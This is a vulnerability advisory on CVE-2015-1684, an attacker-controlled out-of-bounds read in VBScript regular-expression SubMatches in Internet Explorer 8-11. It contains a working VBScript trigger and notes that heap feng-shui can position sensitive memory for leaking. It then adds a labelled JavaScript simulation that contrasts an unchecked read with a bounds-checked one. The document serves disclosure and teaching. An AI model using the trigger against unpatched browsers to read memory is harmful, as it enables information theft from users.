2015-06-11

1502F - MSIE8-11 VBScript CSubMatches::get_Item out-of-bounds read

TL;DR: Details on CVE-2015-1684: an arbitrary read vulnerability in VBScript regular expressions that affected all versions of MSIE, which was fixed by Microsoft in MS15-043 one month ago.

Description

When a VBScript RegExp object is created with an expression that contains a sub match "(...)" inside a look-ahead "(?=...)", and the Execute method is then used to successfully match against a string, the resulting Matches collection will contain Match objects that (under the hood) only store the matched string and do not store the text matched by the look-ahead. However, the SubMatches property can be used to try to read data from within the look-ahead. This results in a controllable out-of-bounds read relative to the address of the matched string data: the offset of the read is determined by where the sub match sits inside the look-ahead and its length by the length of the sub match, so both are attacker controlled. Since the size of the matched string is attacker controlled as well, as is the time of allocation, heap feng-shui techniques may be used to put it in a useful position relative to memory that contains sensitive information the attacker wants to read. Also, if the matched string is empty, a NULL pointer is used as the base, resulting in an absolute read.

Repro

<script language="VBScript">
  Dim oRegExp
  Set oRegExp = New RegExp
  oRegExp.Pattern = "A+(?=0B+([^.]+)*)"
  ' Allocate 0x10 bytes, then read 0x4 bytes at offset 0x12.
  MsgBox(oRegExp.Execute("AAAAA0BBBBBBBBBCC")(0).SubMatches(0))
</script>
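The mechanism from the Description and the Repro above, modelled in JavaScript so it can be run outside MSIE. This is an added example and not code from the original advisory or from Microsoft: the simulated heap, the Match and SubMatches objects, the helper names (captureSpan, FakeHeap, makeMatch, getItemUnsafe, getItemSafe, repro, demo) and the convention that sub-match positions are kept as UTF-16 code-unit offsets from the start of the matched text are all assumptions of the model, and the engine's real internal bookkeeping (the 0x12 byte offset quoted in the repro comment) is not reproduced. It takes the advisory's pattern, computes where the capture group lands relative to the stored match, and shows the unchecked read returning a neighbouring allocation next to a bounds-checked get_Item that refuses a sub-match lying outside the stored text. The repro() knobs go beyond the single input string in the repro to show which input lengths control the allocation size, the read offset and the read length.

```javascript
// Added example, not code from the original advisory or from Microsoft: a model of
// the CVE-2015-1684 mechanism. The VBScript engine is not modelled. The simulated
// heap, the Match/SubMatches objects and the convention that sub-match positions are
// kept as offsets from the start of the matched text are assumptions; they show why a
// capture group inside a look-ahead becomes an out-of-bounds read and what a bounds
// check in get_Item would do about it.

const HAS_INDICES = "hasIndices" in RegExp.prototype;

// Where capture group `group` sits relative to the overall match. Uses the regex `d`
// flag where the engine has it; otherwise assumes the capture follows the overall
// match, which holds for a capture inside a trailing look-ahead.
function captureSpan(re, input, group) {
  const flags = HAS_INDICES && !re.flags.includes("d") ? re.flags + "d" : re.flags;
  const m = new RegExp(re.source, flags).exec(input);
  if (m === null || m[group] === undefined) return null;
  const capStart = m.indices
    ? m.indices[group][0]
    : input.indexOf(m[group], m.index + m[0].length);
  return {
    match: m[0],
    matchLen: m[0].length,
    subStart: capStart - m.index, // code units from the start of the matched text
    subLen: m[group].length,
  };
}

// Simulated heap of UTF-16 code units. Strings are laid out back to back, each
// followed by a NUL, so the next allocation sits directly after the matched text.
class FakeHeap {
  constructor(units) {
    this.mem = new Uint16Array(units);
    this.next = 0;
  }
  allocString(s) {
    const base = this.next;
    for (let i = 0; i < s.length; i++) this.mem[base + i] = s.charCodeAt(i);
    this.mem[base + s.length] = 0;
    this.next = base + s.length + 1;
    return base;
  }
  read(base, offset, len) {
    const lo = base + offset, hi = lo + len;
    if (hi > this.mem.length) throw new RangeError("read past end of simulated heap");
    return String.fromCharCode(...this.mem.subarray(lo, hi));
  }
}

// What the Match object keeps: the matched text only (as one heap allocation) plus
// sub-match (offset, length) pairs that were computed against the whole input.
function makeMatch(heap, re, input) {
  const span = captureSpan(re, input, 1);
  if (span === null) throw new Error("pattern produced no sub-match");
  return { base: heap.allocString(span.match), matchLen: span.matchLen, subs: [span] };
}

// Vulnerable get_Item: trusts the stored offset and reads relative to the match text.
function getItemUnsafe(heap, match, i) {
  const s = match.subs[i];
  return heap.read(match.base, s.subStart, s.subLen);
}

// Bounds-checked get_Item (an assumed check, not Microsoft's fix): a sub-match that
// does not lie inside the stored text came from the look-ahead and was never kept.
function getItemSafe(heap, match, i) {
  const s = match.subs[i];
  if (s.subStart < 0 || s.subStart + s.subLen > match.matchLen) return "";
  return heap.read(match.base, s.subStart, s.subLen);
}

// The three knobs the advisory's pattern A+(?=0B+([^.]+)*) gives an attacker: nA sets
// the size of the stored match (and so of its allocation), nB how far past its end
// the read lands, nC how many code units are read. `neighbour` is constructed data
// standing in for whatever allocation heap feng-shui placed after the match.
function repro(heap, nA, nB, nC, neighbour) {
  const input = "A".repeat(nA) + "0" + "B".repeat(nB) + "C".repeat(nC);
  const match = makeMatch(heap, /A+(?=0B+([^.]+)*)/, input);
  heap.allocString(neighbour);
  return {
    input,
    matchLen: match.matchLen,
    readOffset: match.subs[0].subStart,
    readLen: match.subs[0].subLen,
    leaked: getItemUnsafe(heap, match, 0),
    fixed: getItemSafe(heap, match, 0),
  };
}

// The advisory's repro shape (5 A's, 9 B's) with a longer sub-match so the whole
// constructed neighbour value leaks through the unchecked read.
function demo() {
  return repro(new FakeHeap(64), 5, 9, 8, "fill=....deadbeef");
}

console.log(JSON.stringify(demo()));
```

Run it with node. The match text "AAAAA" is five code units long, yet the capture group starts fifteen code units after it, so the unchecked read lands ten units past the end of the stored text and returns whatever was allocated next; changing nB slides that window and nC widens it. The "fill=....deadbeef" neighbour is constructed data, not anything observed in a real process.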